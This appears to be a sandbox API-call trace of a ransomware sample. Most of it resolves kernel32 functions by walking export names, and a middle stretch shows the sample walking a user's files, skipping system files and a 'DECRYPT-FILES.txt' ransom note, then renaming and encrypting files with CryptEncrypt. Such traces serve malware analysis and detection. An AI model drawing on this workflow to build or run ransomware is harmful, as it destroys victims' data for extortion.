lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0185.769] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0185.769] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0185.769] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0185.769] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0185.769] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0185.769] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0185.769] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0185.769] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0185.769] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0185.769] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0185.769] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0185.769] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0185.769] lstrlenA (lpString="CREATETHREAD") returned 12 [0185.769] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0185.769] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0185.769] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0185.769] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0185.769] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0185.769] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0185.770] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0185.770] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0185.770] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0185.770] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0185.770] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0185.770] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0185.770] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0185.770] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0185.770] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0185.770] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0185.770] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0185.770] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0185.770] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0185.770] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0185.770] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0185.770] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0185.770] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0185.770] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0185.770] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0185.770] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0185.770] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0185.770] lstrlenA (lpString="CTRLROUTINE") returned 11 [0185.770] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0185.770] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0185.770] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0185.770] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0185.770] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0185.770] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0185.770] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0185.770] lstrlenA (lpString="DEBUGBREAK") returned 10 [0185.770] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0185.770] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0185.770] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0185.770] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0185.770] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0185.770] lstrlenA (lpString="DECODEPOINTER") returned 13 [0185.770] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0185.770] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0185.770] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0185.771] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0185.771] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0185.771] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0185.771] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0185.771] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0185.771] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0185.771] lstrlenA (lpString="DELETEATOM") returned 10 [0185.771] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0185.771] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0185.771] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0185.771] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0185.771] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0185.771] lstrlenA (lpString="DELETEFIBER") returned 11 [0185.771] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0185.771] lstrlenA (lpString="DELETEFILEA") returned 11 [0185.771] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0185.771] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0185.771] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0185.771] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0185.771] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0185.771] lstrlenA (lpString="DELETEFILEW") returned 11 [0185.771] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0185.771] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0185.771] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0185.771] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0185.771] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0185.771] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0185.771] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0185.771] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0185.771] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0185.771] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0185.771] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0185.771] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0185.771] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0185.771] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0185.771] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0185.771] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0185.771] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0185.772] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0185.772] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0185.772] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0185.772] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0185.772] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0185.772] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0185.772] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0185.772] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0185.772] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0185.772] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0185.772] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0185.772] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0185.772] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0185.772] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0185.772] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0185.772] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0185.772] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0185.772] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0185.772] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0185.772] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0185.772] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0185.772] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0185.772] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0185.772] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0185.772] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0185.772] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0185.772] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0185.772] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0185.772] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0185.772] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0185.772] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0185.772] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0185.772] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0185.772] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0185.772] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0185.772] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0185.772] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0185.772] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0185.772] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0185.773] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0185.773] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0185.773] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0185.773] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0185.773] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0185.773] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0185.773] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0185.773] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0185.773] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0185.773] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0185.773] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0185.773] lstrcpyW (in: lpString1=0x8b0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0185.773] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url.yxQcBrQ") returned 82 [0185.773] wsprintfW (in: param_1=0x36fe25c, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url.yxQcBrQ.8C7MfZ") returned 89 [0185.773] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url.yxQcBrQ" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url.yxqcbrq"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url.yxQcBrQ.8C7MfZ" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url.yxqcbrq.8c7mfz"), dwFlags=0x0) returned 1 [0185.774] VirtualFree (lpAddress=0x8a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.774] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.775] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.775] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xaefc60a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x18d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Live Spaces.url.yxQcBrQ", cAlternateFileName="WINDOW~2.YXQ")) returned 1 [0185.775] lstrcmpiW (lpString1="Windows Live Spaces.url.yxQcBrQ", lpString2="DECRYPT-FILES.txt") returned 1 [0185.775] lstrcmpiW (lpString1="Windows Live Spaces.url.yxQcBrQ", lpString2="autorun.inf") returned 1 [0185.775] lstrcmpiW (lpString1="Windows Live Spaces.url.yxQcBrQ", lpString2="boot.ini") returned 1 [0185.775] lstrcmpiW (lpString1="Windows Live Spaces.url.yxQcBrQ", lpString2="desktop.ini") returned 1 [0185.775] lstrcmpiW (lpString1="Windows Live Spaces.url.yxQcBrQ", lpString2="ntuser.dat") returned 1 [0185.775] lstrcmpiW (lpString1="Windows Live Spaces.url.yxQcBrQ", lpString2="iconcache.db") returned 1 [0185.775] lstrcmpiW (lpString1="Windows Live Spaces.url.yxQcBrQ", lpString2="bootsect.bak") returned 1 [0185.775] lstrcmpiW (lpString1="Windows Live Spaces.url.yxQcBrQ", lpString2="ntuser.dat.log") returned 1 [0185.775] lstrcmpiW (lpString1="Windows Live Spaces.url.yxQcBrQ", lpString2="thumbs.db") returned 1 [0185.775] lstrcmpiW (lpString1="Windows Live Spaces.url.yxQcBrQ", lpString2="Bootfont.bin") returned 1 [0185.775] lstrlenW (lpString="Windows Live Spaces.url.yxQcBrQ") returned 31 [0185.775] lstrcmpiW (lpString1="yxQcBrQ", lpString2="lnk") returned 1 [0185.775] lstrcmpiW (lpString1="yxQcBrQ", lpString2="exe") returned 1 [0185.775] lstrcmpiW (lpString1="yxQcBrQ", lpString2="sys") returned 1 [0185.775] lstrcmpiW (lpString1="yxQcBrQ", lpString2="dll") returned 1 [0185.775] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned 53 [0185.775] lstrlenW (lpString="Windows Live Spaces.url.yxQcBrQ") returned 31 [0185.775] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" [0185.775] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpString2="Windows Live Spaces.url.yxQcBrQ" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url.yxQcBrQ") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url.yxQcBrQ" [0185.775] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.776] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url.yxQcBrQ" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url.yxqcbrq"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0185.776] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=397) returned 1 [0185.776] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0185.776] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.776] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x20, pbBuffer=0x750000 | out: pbBuffer=0x750000) returned 1 [0185.776] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x8, pbBuffer=0x750020 | out: pbBuffer=0x750020) returned 1 [0185.776] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0185.777] CryptEncrypt (in: hKey=0x479638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8b0000*, pdwDataLen=0x36fe190*=0x28, dwBufLen=0x100 | out: pbData=0x8b0000*, pdwDataLen=0x36fe190*=0x100) returned 1 [0185.777] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x8c0000 [0185.777] VirtualFree (lpAddress=0x8c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.777] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.777] CloseHandle (hObject=0x268) returned 1 [0185.778] SetFilePointerEx (in: hFile=0x264, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0185.778] WriteFile (in: hFile=0x264, lpBuffer=0x8b0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x36fe1b0, lpOverlapped=0x0 | out: lpBuffer=0x8b0000*, lpNumberOfBytesWritten=0x36fe1b0*=0x108, lpOverlapped=0x0) returned 1 [0185.778] CloseHandle (hObject=0x0) returned 0 [0185.778] CloseHandle (hObject=0x264) returned 1 [0185.779] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.779] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.779] GetTickCount () returned 0x1135aed [0185.779] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.779] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0185.779] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x8a0000 [0185.779] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0185.780] lstrlenA (lpString="kernel32.dll") returned 12 [0185.780] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0185.780] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0185.780] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0185.780] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0185.780] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0185.780] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0185.780] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0185.780] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0185.780] lstrlenA (lpString="ADDATOMA") returned 8 [0185.780] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0185.780] lstrlenA (lpString="ADDATOMW") returned 8 [0185.780] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0185.780] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0185.780] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0185.780] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0185.780] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0185.780] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0185.780] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0185.780] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0185.780] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0185.780] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0185.780] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0185.780] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0185.780] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0185.780] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0185.780] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0185.780] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0185.780] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0185.781] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0185.781] lstrcpyA (in: lpString1=0x36fd5a4, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0185.781] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0185.781] lstrcpyA 